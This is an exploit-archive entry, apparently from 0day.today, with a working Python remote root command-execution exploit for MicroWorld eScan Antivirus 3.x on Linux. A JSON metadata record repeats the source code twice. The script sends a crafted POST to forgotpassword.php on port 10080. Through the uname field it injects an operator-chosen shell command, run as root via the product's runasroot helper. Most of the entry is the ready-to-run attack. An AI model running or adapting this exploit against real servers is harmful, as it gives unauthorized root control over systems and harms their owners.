ID 1337DAY-ID-9639 Type zdt Reporter Mohammed almutairi Modified 2010-03-13T00:00:00
Description
Exploit for unknown platform in category remote exploits
==============================================================
MicroWorld eScan Antivirus < 3.x Remote Root Command Execution
==============================================================
#!/usr/bin/env python
import sys
from socket import *
#auther: Mohammed almutairi
#([email protected])
"""
MicroWorld eScan Antivirus < 3.x Remote Root Command Execution
Package MWADMIN package vulnerabilities (linux)
The Base Packages (MWADMIN and MWAV) must be installed before eScan
Link:
http://www.escanav.com/english/content/products/escan_linux/linux_products.asp
infcted: aLL version 3.X eScan linux
1-Escan for Linux Desktop
2-Escan for Linux file Servers
3-MailScan for Linux and webscan
Tested On RedHat and Fedora
ULTRA PRIV8 :)
Description:
From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
include("common_functions.php"); <---> (1)
if ($_POST['forgot'] == "Send Password")
{
$user = $_POST["uname"]; <--->(2) insecure:(
vulnerable code in forgotpassword.php and common_functions.php
in (1) $runasroot = "/opt/MicroWorld/sbin/runasroot";
we can injection through via the file forgotpassword.php As you can see (2)
with remote root Command Execution
>> eScan.py www.***.com
[email protected]/bin/sh:$Sa$ => reboot
[*] Done! sent to: www.***.com
"""
def xpl():
if len(sys.argv) < 2:
print "[*] MicroWorld eScan Antivirus Remote Root Command Execution"
print "[*] exploited by Mohammed almutairi"
print "[*] usage: %s host" % sys.argv[0]
return
host = sys.argv[1]
port = 10080 # default port
cmd = raw_input("[email protected]/bin/sh:$Sa$ => ")
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sh="/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'" % cmd
sa= "uname=;%s;" %sh # (;sh;) ---> Here Play See to ^(2)^
sa+= "&forgot=Send+Password"
s="POST /forgotpassword.php HTTP/1.1\r\n"
s+="Host: %s:%d\r\n"%(host, port)
s+="User-Agent: */*\r\n"
s+="Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
s+="Content-Type: application/x-www-form-urlencoded\r\n"
s+="Content-Length: %d \r\n\r\n"%len(sa)
s+=sa
sock.sendall(s)
print "[*] Done! sent to: %s" % host
sock.close()
if __name__=="__main__":
xpl()
sys.exit(0)
# 0day.today [2018-03-28] #
{"id": "1337DAY-ID-9639", "bulletinFamily": "exploit", "title": "MicroWorld eScan Antivirus < 3.x Remote Root Command Execution", "description": "Exploit for unknown platform in category remote exploits", "published": "2010-03-13T00:00:00", "modified": "2010-03-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/9639", "reporter": "Mohammed almutairi", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-28T13:22:14", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category remote exploits", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T02:06:45", "value": 8.3, "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "207b0614388866bcb4e0940ecc186533d78008ea0de4490e9337aa23c3ee8b29", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c80d5d6b71bbd3dc040b3e00dbfa4b96", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "01a2dd5a3def2a0500c3ee76b8152629", "key": "reporter"}, {"hash": "e474ce491e876f2a743d27202ce66a17", "key": "sourceHref"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "007d0688e898cc1245c22de808927254", "key": "title"}, {"hash": "aced9e688de4d021235a2a74b0b36df3", "key": "published"}, {"hash": "aced9e688de4d021235a2a74b0b36df3", "key": "modified"}, {"hash": "9af204a4ba56a0e3dd6b86bcfbc0ebcc", "key": "sourceData"}], "history": [], "href": "http://0day.today/exploit/description/9639", "id": "1337DAY-ID-9639", "lastseen": "2016-04-20T02:06:45", "modified": "2010-03-13T00:00:00", "objectVersion": "1.0", "published": "2010-03-13T00:00:00", "references": [], "reporter": "Mohammed almutairi", "sourceData": "==============================================================\r\nMicroWorld eScan Antivirus < 3.x Remote Root Command Execution\r\n==============================================================\r\n\r\n#!/usr/bin/env python\r\nimport sys\r\nfrom socket import *\r\n \r\n#auther: Mohammed almutairi\r\n#(Sa.attacker@gmail.com)\r\n\"\"\"\r\nMicroWorld eScan Antivirus < 3.x Remote Root Command Execution\r\nPackage MWADMIN package vulnerabilities (linux)\r\nThe Base Packages (MWADMIN and MWAV) must be installed before eScan\r\nLink:\r\nhttp://www.escanav.com/english/content/products/escan_linux/linux_products.asp\r\ninfcted: aLL version 3.X eScan linux\r\n1-Escan for Linux Desktop\r\n2-Escan for Linux file Servers\r\n3-MailScan for Linux and webscan\r\nTested On RedHat and Fedora\r\nULTRA PRIV8 :)\r\n \r\nDescription:\r\n \r\nFrom /opt/MicroWorld/var/www/htdocs/forgotpassword.php:\r\ninclude(\"common_functions.php\"); <---> (1)\r\n \r\nif ($_POST['forgot'] == \"Send Password\")\r\n{\r\n $user = $_POST[\"uname\"]; <--->(2) insecure:(\r\n \r\n \r\nvulnerable code in forgotpassword.php and common_functions.php\r\nin (1) $runasroot = \"/opt/MicroWorld/sbin/runasroot\";\r\nwe can injection through via the file forgotpassword.php As you can see (2)\r\nwith remote root Command Execution\r\n>> eScan.py www.***.com\r\neScan@/bin/sh:$Sa$ => reboot\r\n[*] Done! sent to: www.***.com\r\n\"\"\"\r\n \r\ndef xpl():\r\n if len(sys.argv) < 2:\r\n print \"[*] MicroWorld eScan Antivirus Remote Root Command Execution\"\r\n print \"[*] exploited by Mohammed almutairi\"\r\n print \"[*] usage: %s host\" % sys.argv[0]\r\n return\r\n \r\n host = sys.argv[1]\r\n port = 10080 # default port\r\n cmd = raw_input(\"eScan@/bin/sh:$Sa$ => \")\r\n sock=socket(AF_INET, SOCK_STREAM)\r\n sock.connect((host,port))\r\n sh=\"/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'\" % cmd\r\n \r\n sa= \"uname=;%s;\" %sh # (;sh;) ---> Here Play See to ^(2)^\r\n sa+= \"&forgot=Send+Password\"\r\n \r\n s=\"POST /forgotpassword.php HTTP/1.1\\r\\n\"\r\n s+=\"Host: %s:%d\\r\\n\"%(host, port)\r\n s+=\"User-Agent: */*\\r\\n\"\r\n s+=\"Accept: ar,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n s+=\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n s+=\"Content-Length: %d \\r\\n\\r\\n\"%len(sa)\r\n s+=sa\r\n \r\n sock.sendall(s)\r\n print \"[*] Done! sent to: %s\" % host\r\n sock.close()\r\n \r\nif __name__==\"__main__\":\r\n xpl()\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/9639", "title": "MicroWorld eScan Antivirus < 3.x Remote Root Command Execution", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:06:45"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0"}, {"key": "href", "hash": "ebb4610ab060b0b55ab3ae0bcf7aaa1c"}, {"key": "modified", "hash": "aced9e688de4d021235a2a74b0b36df3"}, {"key": "published", "hash": "aced9e688de4d021235a2a74b0b36df3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "01a2dd5a3def2a0500c3ee76b8152629"}, {"key": "sourceData", "hash": "2f16ff369a2086bb30353e4b566a5213"}, {"key": "sourceHref", "hash": "17ae7adafb66b7c403a29358f7c239a8"}, {"key": "title", "hash": "007d0688e898cc1245c22de808927254"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "1a579d4239c05d9e29ac4508ce2bfac561dae3dd7542af3acb44b413f13d710e", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/9639", "sourceData": "==============================================================\r\nMicroWorld eScan Antivirus < 3.x Remote Root Command Execution\r\n==============================================================\r\n\r\n#!/usr/bin/env python\r\nimport sys\r\nfrom socket import *\r\n \r\n#auther: Mohammed almutairi\r\n#([email\u00a0protected])\r\n\"\"\"\r\nMicroWorld eScan Antivirus < 3.x Remote Root Command Execution\r\nPackage MWADMIN package vulnerabilities (linux)\r\nThe Base Packages (MWADMIN and MWAV) must be installed before eScan\r\nLink:\r\nhttp://www.escanav.com/english/content/products/escan_linux/linux_products.asp\r\ninfcted: aLL version 3.X eScan linux\r\n1-Escan for Linux Desktop\r\n2-Escan for Linux file Servers\r\n3-MailScan for Linux and webscan\r\nTested On RedHat and Fedora\r\nULTRA PRIV8 :)\r\n \r\nDescription:\r\n \r\nFrom /opt/MicroWorld/var/www/htdocs/forgotpassword.php:\r\ninclude(\"common_functions.php\"); <---> (1)\r\n \r\nif ($_POST['forgot'] == \"Send Password\")\r\n{\r\n $user = $_POST[\"uname\"]; <--->(2) insecure:(\r\n \r\n \r\nvulnerable code in forgotpassword.php and common_functions.php\r\nin (1) $runasroot = \"/opt/MicroWorld/sbin/runasroot\";\r\nwe can injection through via the file forgotpassword.php As you can see (2)\r\nwith remote root Command Execution\r\n>> eScan.py www.***.com\r\n[email\u00a0protected]/bin/sh:$Sa$ => reboot\r\n[*] Done! sent to: www.***.com\r\n\"\"\"\r\n \r\ndef xpl():\r\n if len(sys.argv) < 2:\r\n print \"[*] MicroWorld eScan Antivirus Remote Root Command Execution\"\r\n print \"[*] exploited by Mohammed almutairi\"\r\n print \"[*] usage: %s host\" % sys.argv[0]\r\n return\r\n \r\n host = sys.argv[1]\r\n port = 10080 # default port\r\n cmd = raw_input(\"[email\u00a0protected]/bin/sh:$Sa$ => \")\r\n sock=socket(AF_INET, SOCK_STREAM)\r\n sock.connect((host,port))\r\n sh=\"/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'\" % cmd\r\n \r\n sa= \"uname=;%s;\" %sh # (;sh;) ---> Here Play See to ^(2)^\r\n sa+= \"&forgot=Send+Password\"\r\n \r\n s=\"POST /forgotpassword.php HTTP/1.1\\r\\n\"\r\n s+=\"Host: %s:%d\\r\\n\"%(host, port)\r\n s+=\"User-Agent: */*\\r\\n\"\r\n s+=\"Accept: ar,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n s+=\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n s+=\"Content-Length: %d \\r\\n\\r\\n\"%len(sa)\r\n s+=sa\r\n \r\n sock.sendall(s)\r\n print \"[*] Done! sent to: %s\" % host\r\n sock.close()\r\n \r\nif __name__==\"__main__\":\r\n xpl()\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2018-03-28] #"}